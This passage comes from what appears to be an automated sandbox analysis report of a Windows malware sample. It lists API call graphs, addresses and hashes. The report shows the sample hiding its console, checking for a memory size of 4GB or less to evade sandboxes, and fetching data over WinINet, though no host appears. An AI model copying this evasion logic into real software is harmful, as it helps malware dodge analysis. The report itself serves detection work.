                                                                      • __dosmaperr.LIBCMT ref: 00AC4459
                                                                      • GetFileType.KERNELBASE(00000000), ref: 00AC4465
                                                                      • GetLastError.KERNEL32 ref: 00AC446F
                                                                      • __dosmaperr.LIBCMT ref: 00AC4478
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00AC4498
                                                                      • CloseHandle.KERNEL32(00ABAD9E), ref: 00AC45E5
                                                                      • GetLastError.KERNEL32 ref: 00AC4617
                                                                      • __dosmaperr.LIBCMT ref: 00AC461E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: cb90a8935159640fa270dd1e410ab7b26ef677b05e43d7d06016832b2bc99738
                                                                      • Instruction ID: 595fffdf429874b7de0a1f7035937afe424ef628f9f562911936d93298c8ea7a
                                                                      • Opcode Fuzzy Hash: cb90a8935159640fa270dd1e410ab7b26ef677b05e43d7d06016832b2bc99738
                                                                      • Instruction Fuzzy Hash: F7A12532A141549FCF19DFA8DD62FAD7BB0AB4A320F29015DF801AF392CB348916CB55

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 00AA2CDB
                                                                        • Part of subcall function 00AA2B40: task.LIBCPMTD ref: 00AA2C92
                                                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 00AA2D19
                                                                      • task.LIBCPMTD ref: 00AA2D25
                                                                      • InternetReadFile.WININET(00000000,00000001,00000400,00000000), ref: 00AA2D87
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00AA2DC1
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00AA2DDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$CloseHandleOpentask$FileRead
                                                                      • String ID: Mozilla/5.0
                                                                      • API String ID: 3826775226-2630049532
                                                                      • Opcode ID: 52fe06be985d272533941236a2c35e77278372a666e846f6590d6f40bc205b0d
                                                                      • Instruction ID: 5c3699afa7d5f2c1058252e7cf71abc724459b553622bb63fb34b403eedf4ac8
                                                                      • Opcode Fuzzy Hash: 52fe06be985d272533941236a2c35e77278372a666e846f6590d6f40bc205b0d
                                                                      • Instruction Fuzzy Hash: AA318D71900209EBDB24DFA4DD56FFEB774BB44700F108659B602772C1DB74AA41CB90

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 257 aa3510-aa354c GetConsoleWindow ShowWindow GlobalMemoryStatusEx 258 aa354e 257->258 259 aa357d-aa3588 Sleep call aa31b0 257->259 261 aa3559-aa3579 call aa7950 call aa4e40 258->261 262 aa3550-aa3557 258->262 264 aa358d-aa35a1 Sleep call aa2e30 259->264 271 aa35a3-aa35a6 261->271 262->259 262->261 264->271
                                                                      APIs
                                                                      • GetConsoleWindow.KERNELBASE ref: 00AA3516
                                                                      • ShowWindow.USER32(?,00000000), ref: 00AA3525
                                                                      • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00AA3536
                                                                      • Sleep.KERNELBASE(00000BB8), ref: 00AA3582
                                                                      • Sleep.KERNEL32(00000BB8), ref: 00AA3592
                                                                      Strings
                                                                      • Memory is less than or equal to 4GB. Exiting..., xrefs: 00AA355E
                                                                      • @, xrefs: 00AA352B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: SleepWindow$ConsoleGlobalMemoryShowStatus
                                                                      • String ID: @$Memory is less than or equal to 4GB. Exiting...
                                                                      • API String ID: 4178238871-156674193
                                                                      • Opcode ID: 2b709f48d8780ce6072a5e7db6b091b115ade50757011d4dd82fbf79c463058b
                                                                      • Instruction ID: 5abf4422f80d363c6ac29c3d62750aade612a0d0dd4dfbc4ea58a2bc0e362e3d
                                                                      • Opcode Fuzzy Hash: 2b709f48d8780ce6072a5e7db6b091b115ade50757011d4dd82fbf79c463058b
                                                                      • Instruction Fuzzy Hash: 27015E75D00308AFCF10EBE8D90AA5EBBB4BB45711F004459F902A32D0DBB856458F11

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 272 ab9eac-ab9ebc 273 ab9ebe-ab9ed1 call ab1e95 call ab1ea8 272->273 274 ab9ed6-ab9ed8 272->274 288 aba230 273->288 275 aba218-aba225 call ab1e95 call ab1ea8 274->275 276 ab9ede-ab9ee4 274->276 293 aba22b call ab12dd 275->293 276->275 278 ab9eea-ab9f13 276->278 278->275 282 ab9f19-ab9f22 278->282 286 ab9f3c-ab9f3e 282->286 287 ab9f24-ab9f37 call ab1e95 call ab1ea8 282->287 291 aba214-aba216 286->291 292 ab9f44-ab9f48 286->292 287->293 294 aba233-aba236 288->294 291->294 292->291 296 ab9f4e-ab9f52 292->296 293->288 296->287 299 ab9f54-ab9f6b 296->299 301 ab9f6d-ab9f70 299->301 302 ab9fa0-ab9fa6 299->302 305 ab9f72-ab9f78 301->305 306 ab9f96-ab9f9e 301->306 303 ab9f7a-ab9f91 call ab1e95 call ab1ea8 call ab12dd 302->303 304 ab9fa8-ab9faf 302->304 337 aba14b 303->337 309 ab9fb3-ab9fd1 call ab830e call ab73d1 * 2 304->309 310 ab9fb1 304->310 305->303 305->306 308 aba013-aba032 306->308 312 aba038-aba044 308->312 313 aba0ee-aba0f7 call ac1db0 308->313 341 ab9fee-aba011 call aba43d 309->341 342 ab9fd3-ab9fe9 call ab1ea8 call ab1e95 309->342 310->309 312->313 317 aba04a-aba04c 312->317 324 aba0f9-aba10b 313->324 325 aba168 313->325 317->313 321 aba052-aba073 317->321 321->313 326 aba075-aba08b 321->326 324->325 331 aba10d-aba11c GetConsoleMode 324->331 329 aba16c-aba182 ReadFile 325->329 326->313 332 aba08d-aba08f 326->332 335 aba1e0-aba1eb GetLastError 329->335 336 aba184-aba18a 329->336 331->325 338 aba11e-aba122 331->338 332->313 333 aba091-aba0b4 332->333 333->313 340 aba0b6-aba0cc 333->340 343 aba1ed-aba1ff call ab1ea8 call ab1e95 335->343 344 aba204-aba207 335->344 336->335 345 aba18c 336->345 339 aba14e-aba158 call ab73d1 337->339 338->329 346 aba124-aba13c ReadConsoleW 338->346 339->294 340->313 348 aba0ce-aba0d0 340->348 341->308 342->337 343->337 355 aba20d-aba20f 344->355 356 aba144-aba14a call ab1e4e 344->356 352 aba18f-aba1a1 345->352 353 aba13e GetLastError 346->353 354 aba15d-aba166 346->354 348->313 358 aba0d2-aba0e9 348->358 352->339 362 aba1a3-aba1a7 352->362 353->356 354->352 355->339 356->337 358->313 366 aba1a9-aba1b9 call ab9bbe 362->366 367 aba1c0-aba1cd 362->367 379 aba1bc-aba1be 366->379 372 aba1d9-aba1de call ab9a04 367->372 373 aba1cf call ab9d15 367->373 377 aba1d4-aba1d7 372->377 373->377 377->379 379->339
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0ea780f3ffc77e0d50879f4957d096b7d4760d9e4715785e93df8b13e28907a
                                                                      • Instruction ID: 84185b12422e82e6a02cd3a49a80723c63c333c9b9b37169cf45631ac88ab9dc
                                                                      • Opcode Fuzzy Hash: a0ea780f3ffc77e0d50879f4957d096b7d4760d9e4715785e93df8b13e28907a
                                                                      • Instruction Fuzzy Hash: 4AB12570E04209AFDB11DFACD840BFE7BB9BF5A310F544259E9019B293C7759942CB62

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 380 aa3f10-aa3f1d 381 aa3f1f 380->381 382 aa3f30-aa3f37 380->382 383 aa3f21-aa3f25 381->383 384 aa3f27-aa3f2b 381->384 385 aa3f39-aa3f4d call aa4900 382->385 386 aa3f52-aa3f73 call aa6090 382->386 383->382 383->384 387 aa4067-aa406a 384->387 385->387 392 aa3fc1-aa3fc8 386->392 393 aa3f75-aa3fbc call aa4070 call aa61f0 call aa6c60 call aa6170 386->393 394 aa4058-aa4065 392->394 395 aa3fce-aa3fd6 call aa5bb0 392->395 393->392 394->387 402 aa3fdd-aa3fe4 395->402 404 aa4031-aa4035 402->404 405 aa3fe6-aa401c call ab0c20 402->405 404->394 406 aa4037-aa4048 call ab0c20 404->406 413 aa401e-aa402d 405->413 414 aa402f 405->414 412 aa404d-aa4055 406->412 412->394 413->387 414->402
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock$Min_value
                                                                      • String ID:
                                                                      • API String ID: 3100174245-0
                                                                      • Opcode ID: 3c3749919c9a63ec5bd6beb19ce55b8a7d9094cc88d032b5d89156b829ee7930
                                                                      • Instruction ID: a041453e7d047b33a40cc8a0b00b1955874faff36da098a3b62bce9f8bf755ea
                                                                      • Opcode Fuzzy Hash: 3c3749919c9a63ec5bd6beb19ce55b8a7d9094cc88d032b5d89156b829ee7930
                                                                      • Instruction Fuzzy Hash: 3151FA75E00109EFDB08DFA8C994AAEBBB1FF89304F108169E915AB381D774AE45DB50

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 415 ab71b5-ab71d7 416 ab73ca 415->416 417 ab71dd-ab71df 415->417 418 ab73cc-ab73d0 416->418 419 ab720b-ab722e 417->419 420 ab71e1-ab7200 call ab1260 417->420 422 ab7230-ab7232 419->422 423 ab7234-ab723a 419->423 426 ab7203-ab7206 420->426 422->423 425 ab723c-ab724d 422->425 423->420 423->425 427 ab724f-ab725d call aba47d 425->427 428 ab7260-ab7270 call ab6cfa 425->428 426->418 427->428 433 ab72b9-ab72cb 428->433 434 ab7272-ab7278 428->434 435 ab72cd-ab72d3 433->435 436 ab7322-ab7342 WriteFile 433->436 437 ab727a-ab727d 434->437 438 ab72a1-ab72b7 call ab68cb 434->438 442 ab730e-ab7320 call ab6d77 435->442 443 ab72d5-ab72d8 435->443 439 ab734d 436->439 440 ab7344-ab734a GetLastError 436->440 444 ab7288-ab7297 call ab6c92 437->444 445 ab727f-ab7282 437->445 455 ab729a-ab729c 438->455 450 ab7350-ab735b 439->450 440->439 462 ab72f5-ab72f8 442->462 451 ab72fa-ab730c call ab6f3b 443->451 452 ab72da-ab72dd 443->452 444->455 445->444 446 ab7362-ab7365 445->446 458 ab7368-ab736a 446->458 456 ab735d-ab7360 450->456 457 ab73c5-ab73c8 450->457 451->462 452->458 459 ab72e3-ab72f0 call ab6e52 452->459 455->450 456->446 457->418 463 ab7398-ab73a4 458->463 464 ab736c-ab7371 458->464 459->462 462->455 466 ab73ae-ab73c0 463->466 467 ab73a6-ab73ac 463->467 468 ab738a-ab7393 call ab1e71 464->468 469 ab7373-ab7385 464->469 466->426 467->416 467->466 468->426 469->426
                                                                      APIs
                                                                        • Part of subcall function 00AB68CB: GetConsoleOutputCP.KERNEL32(10830A53,00000000,00000000,?), ref: 00AB692E
                                                                      • WriteFile.KERNELBASE(?,00000000,00AB0FCF,?,00000000,00000000,00000000,?,00000000,?,00AA9774,00AB0FCF,00000000,00AA9774,?,?), ref: 00AB733A
                                                                      • GetLastError.KERNEL32(?,00AB0FCF,00000000,?,00AA9774,?,00000000,00000000), ref: 00AB7344
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorFileLastOutputWrite
                                                                      • String ID:
                                                                      • API String ID: 2915228174-0
                                                                      • Opcode ID: 01673b37be38acd84840e79c967cd8d1e6f631cd289cf431189964d7ee16ac5a
                                                                      • Instruction ID: 9f06a02444400b0a5a6e737085f8116de00c85b4a8d72f6a484bccd09139be27
                                                                      • Opcode Fuzzy Hash: 01673b37be38acd84840e79c967cd8d1e6f631cd289cf431189964d7ee16ac5a
                                                                      • Instruction Fuzzy Hash: C1618F71908219AEDF11CFA8C984AFEBBBDBF99304F140149F804AB253D7B5D901DBA0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 472 ab6670-ab6675 473 ab6677-ab668f 472->473 474 ab669d-ab66a6 473->474 475 ab6691-ab6695 473->475 477 ab66b8 474->477 478 ab66a8-ab66ab 474->478 475->474 476 ab6697-ab669b 475->476 480 ab6712-ab6716 476->480 479 ab66ba-ab66c7 GetStdHandle 477->479 481 ab66ad-ab66b2 478->481 482 ab66b4-ab66b6 478->482 483 ab66c9-ab66cb 479->483 484 ab66f4-ab6706 479->484 480->473 485 ab671c-ab671f 480->485 481->479 482->479 483->484 486 ab66cd-ab66d6 GetFileType 483->486 484->480 487 ab6708-ab670b 484->487 486->484 488 ab66d8-ab66e1 486->488 487->480 489 ab66e9-ab66ec 488->489 490 ab66e3-ab66e7 488->490 489->480 491 ab66ee-ab66f2 489->491 490->480 491->480
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00AB66BC
                                                                      • GetFileType.KERNELBASE(00000000), ref: 00AB66CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandleType
                                                                      • String ID:
                                                                      • API String ID: 3000768030-0
                                                                      • Opcode ID: de0e2f478649defdd8aa14f0de7b4ad9f19832975d790298c5791e195ed6bc50
                                                                      • Instruction ID: 96a85e1a428a3323252512f90fe10e6c24916f2403ff707ac49f537dd850c666
                                                                      • Opcode Fuzzy Hash: de0e2f478649defdd8aa14f0de7b4ad9f19832975d790298c5791e195ed6bc50
                                                                      • Instruction Fuzzy Hash: 1311847110475146C7388F3D8C986A27B99B756334B38071AD4B7875F3DB3CD8C6A645

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 492 aba35c-aba374 call abf476 495 aba38a-aba3a0 SetFilePointerEx 492->495 496 aba376-aba37d 492->496 498 aba3a2-aba3b3 GetLastError call ab1e71 495->498 499 aba3b5-aba3bf 495->499 497 aba384-aba388 496->497 501 aba3db-aba3de 497->501 498->497 499->497 500 aba3c1-aba3d6 499->500 500->501
                                                                      APIs
                                                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00AD5818,00AA9774,00000002,00AA9774,00000000,?,?,?,00ABA466,00000000,?,00AA9774,00000002,00AD5818), ref: 00ABA398
                                                                      • GetLastError.KERNEL32(00AA9774,?,?,?,00ABA466,00000000,?,00AA9774,00000002,00AD5818,00000000,00AA9774,00000000,00AD5818,0000000C,00AB10A6), ref: 00ABA3A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: 4684af125b338680bef13725302adca6fffc7719f6ded8e1111addef881ef974
                                                                      • Instruction ID: df234a53fceb16438622132b12d0e068a8bee779abdeb3341a9670f5b66b2528
                                                                      • Opcode Fuzzy Hash: 4684af125b338680bef13725302adca6fffc7719f6ded8e1111addef881ef974
                                                                      • Instruction Fuzzy Hash: B7012636600104AFCF05CF59DC05DEE3FAEEB90320B240208F8019B1A2EA71DD42CB90

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 504 ab73d1-ab73da 505 ab7409-ab740a 504->505 506 ab73dc-ab73ef RtlFreeHeap 504->506 506->505 507 ab73f1-ab7408 GetLastError call ab1e0b call ab1ea8 506->507 507->505
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,00ABFBF4,00AADDC1,00000000,00AADDC1,?,00ABFE95,00AADDC1,00000007,00AADDC1,?,00AC0389,00AADDC1,00AADDC1), ref: 00AB73E7
                                                                      • GetLastError.KERNEL32(00AADDC1,?,00ABFBF4,00AADDC1,00000000,00AADDC1,?,00ABFE95,00AADDC1,00000007,00AADDC1,?,00AC0389,00AADDC1,00AADDC1), ref: 00AB73F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 485612231-0
                                                                      • Opcode ID: 1700170cf4eb5376bccaa2fffceae8ac499b72c404596f84728ccb9beb2d9061
                                                                      • Instruction ID: c9b4730a841e37e1e90ace5c995c0e2fc50644dcae6582f4034c304f6c3cd975
                                                                      • Opcode Fuzzy Hash: 1700170cf4eb5376bccaa2fffceae8ac499b72c404596f84728ccb9beb2d9061
                                                                      • Instruction Fuzzy Hash: 44E0E6365042156BCB126FE4AC09FE93B6DAB44752F554015F508960A1DA748952C7D4

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 512 ab92b2-ab92bf 513 ab92e9-ab92fd call ab5d12 512->513 514 ab92c1-ab92e4 call ab1260 512->514 520 ab92ff 513->520 521 ab9302-ab930b call aba41f 513->521 519 ab9450-ab9452 514->519 520->521 523 ab9310-ab931f 521->523 524 ab932f-ab9338 523->524 525 ab9321 523->525 528 ab933a-ab9347 524->528 529 ab934c-ab9380 524->529 526 ab93f9-ab93fe 525->526 527 ab9327-ab9329 525->527 530 ab944e-ab944f 526->530 527->524 527->526 531 ab944c 528->531 532 ab93dd-ab93e9 529->532 533 ab9382-ab938c 529->533 530->519 531->530 534 ab93eb-ab93f2 532->534 535 ab9400-ab9403 532->535 536 ab938e-ab939a 533->536 537 ab93b3-ab93bf 533->537 534->526 540 ab9406-ab940e 535->540 536->537 538 ab939c-ab93ae call ab961e 536->538 537->535 539 ab93c1-ab93db call ab97c9 537->539 538->530 539->540 543 ab944a 540->543 544 ab9410-ab9416 540->544 543->531 547 ab9418-ab942c call ab9453 544->547 548 ab942e-ab9432 544->548 547->530 549 ab9445-ab9447 548->549 550 ab9434-ab9442 call ac6ae0 548->550 549->543 550->549
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ec40945590330137b3e0935fc7948b7ba4707c1f209cae0cc5214b3ac7497143
                                                                      • Instruction ID: abe17a202326a96dec8d27960270f884f7d8b9b3ba75cc1d6264e150bdc09b25
                                                                      • Opcode Fuzzy Hash: ec40945590330137b3e0935fc7948b7ba4707c1f209cae0cc5214b3ac7497143
                                                                      • Instruction Fuzzy Hash: 4D51D070A00208AFDF14CF58C995AEABFB9EF49324F248159E9499B353D2319E42CB91

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00AA63F0: std::ios_base::clear.LIBCPMTD ref: 00AA6421
                                                                      • fpos.LIBCPMTD ref: 00AA395A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: fposstd::ios_base::clear
                                                                      • String ID:
                                                                      • API String ID: 1508181384-0
                                                                      • Opcode ID: efeb063a0a442d5bc828191100a1bef24089dc98b37674bb650717c05bba217e
                                                                      • Instruction ID: c4ce29df7858a10d474b7eb85015e6dfc3654ee71fd39447bdbfee7801e89677
                                                                      • Opcode Fuzzy Hash: efeb063a0a442d5bc828191100a1bef24089dc98b37674bb650717c05bba217e
                                                                      • Instruction Fuzzy Hash: 7E310A75A006099FCB04DFA8C991BBEB7B1FF89710F148618E5256B3D1CB31A901CB90

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 592 aa4c10-aa4c39 593 aa4c3b-aa4c5c call aa6380 592->593 594 aa4c5f-aa4cd9 call aa6b60 call aa62d0 call aa5f70 call aa5e90 592->594 593->594 605 aa4cdb-aa4cec call aa63c0 594->605 606 aa4cf1-aa4d08 594->606 605->606
                                                                      APIs
                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00AA4C4A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
